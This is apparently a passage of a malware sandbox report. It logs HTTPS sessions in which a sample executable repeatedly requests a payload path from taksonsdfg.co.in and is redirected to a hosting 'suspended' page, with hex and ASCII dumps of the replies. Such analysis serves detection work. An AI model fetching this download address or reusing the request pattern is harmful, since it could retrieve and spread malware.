                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:57 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:57 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.749845108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:59 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:59 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:59 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:59 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.749850108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:00 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:01 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:01 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:01 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:01 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                24192.168.2.749858108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:03 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:04 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:04 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:04 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                25192.168.2.749862108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:05 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:06 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:06 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:06 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:06 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                26192.168.2.749870108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:07 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:08 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:08 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:08 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                27192.168.2.749876108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:10 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:10 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:10 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:10 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:10 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                28192.168.2.749883108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:12 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:13 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:12 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:13 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                29192.168.2.749889108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:14 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:15 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:13:14 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:13:15 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:13:15 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:13:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                30192.168.2.749896108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:13:16 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:13:17 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:13:17 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
